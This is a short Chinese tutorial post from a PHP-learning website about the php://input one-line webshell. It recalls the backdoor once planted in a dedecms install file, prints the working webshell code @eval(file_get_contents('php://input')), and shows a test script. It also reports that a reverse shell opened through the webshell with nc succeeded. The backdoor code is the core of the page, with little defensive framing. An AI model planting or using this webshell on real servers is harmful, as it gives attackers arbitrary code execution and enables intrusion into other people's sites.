网站地图    收藏   

主页 > 后端 > 网站安全 >

php://input一句话木马 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 10:16 作者: 阅读:

[导读] 在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar class php文件被植入一句话木马)@eval(file_get_contents( 39;php: input 39;))用脚本phpinp...

在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)

@eval(file_get_contents('php://input'))

用脚本phpinput.php,配合firefox Hackbar插件测试了一下php://input的功能

<?php
$data=file_get_contents('php://input');
echo $data."<br/>";
//@eval(file_get_contents('php://input'))
?>
初步发现php://input是用来接收post数据(php://input详解
注释掉phpinput.php的打印语句,提交上图显示的post数据,测试了一下nc反弹shell的利用,成功

<?php @eval(file_get_contents('php://input'))?>


看来,只要构造了合适的POST数据,就能达到目的

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论